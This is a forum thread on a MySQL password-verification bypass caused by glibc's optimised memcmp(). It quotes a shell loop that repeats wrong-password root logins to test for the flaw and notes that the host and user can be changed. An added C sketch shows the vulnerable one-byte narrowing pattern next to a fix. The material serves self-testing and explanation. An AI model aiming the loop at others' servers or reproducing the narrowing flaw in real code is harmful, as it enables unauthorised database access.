MySQL vulnerability allows attackers to bypass password verification

Look at the version numbers of MySQL server ports in the ports tree and compare them to the version numbers in the linked articles...
 
frijsdijk said:

According to an article on The H, this is a problem of the memcmp() function in the SSE-optimised glibc of several Linux distributions, and the article further states that "the GCC built in memcmp and BSD libc memcmp are safe".

The German counterpart of said article on Heise-Online provides a simple terminal command to check for the vulnerability on localhost:

$ for i in `seq 1 1000`; do mysql -u root --password=bad -h 127.0.0.1 2>/dev/null; done

If this comes up with the mysql prompt, then the server is vulnerable. You may want to change the -u and -h options for checking other users/servers.

Best regards

Rolf
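Why the memcmp() implementation matters, as an added C sketch that is not part of the posts above and not MySQL's own code: ISO C fixes only the sign of memcmp()'s result, so code that narrows that int to a one-byte boolean can report some mismatches as 0 ("match"). The names `wide_cmp`, `one_byte_bool`, `check_narrowed` and `check_fixed` are hypothetical, and the all-zero 20-byte expected value is constructed sample data.

```c
#include <stdio.h>

typedef unsigned char u8;
typedef char one_byte_bool; /* hypothetical name for a 1-byte boolean type */

/* Constructed stand-in for a word-at-a-time memcmp(): returns the difference
 * of the first differing 16-bit big-endian pair, so it can exceed 255. */
static int wide_cmp(const u8 *a, const u8 *b, size_t n)
{
    for (size_t i = 0; i + 1 < n; i += 2) {
        int x = (a[i] << 8) | a[i + 1];
        int y = (b[i] << 8) | b[i + 1];
        if (x != y) return x - y;
    }
    return 0;
}

/* Flawed pattern: the int is narrowed to one byte; 0 means "match". */
static one_byte_bool check_narrowed(const u8 *got, const u8 *want, size_t n)
{
    return (one_byte_bool)wide_cmp(got, want, n);
}

/* Hardened pattern: collapse to 0/1 before anything is narrowed. */
static one_byte_bool check_fixed(const u8 *got, const u8 *want, size_t n)
{
    return (one_byte_bool)(wide_cmp(got, want, n) != 0);
}

/* Try every wrong value of the first byte pair against the expected value
 * and count how many mismatches are reported as a match. */
static int count_false_accepts(int use_fixed)
{
    u8 want[20] = {0}, got[20] = {0};
    int accepted = 0;
    for (int v = 1; v <= 0xFFFF; v++) {
        got[0] = (u8)(v >> 8);
        got[1] = (u8)(v & 0xFF);
        one_byte_bool r = use_fixed ? check_fixed(got, want, 20)
                                    : check_narrowed(got, want, 20);
        accepted += (r == 0);
    }
    return accepted;
}

int main(void)
{
    printf("narrowed=%d fixed=%d (of 65535 wrong values)\n",
           count_false_accepts(0), count_false_accepts(1));
}
```

With the narrowed check, roughly one wrong value in 256 is accepted, which fits the check above repeating the login many times; a byte-wise memcmp() that only returns small differences never hits the case.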
 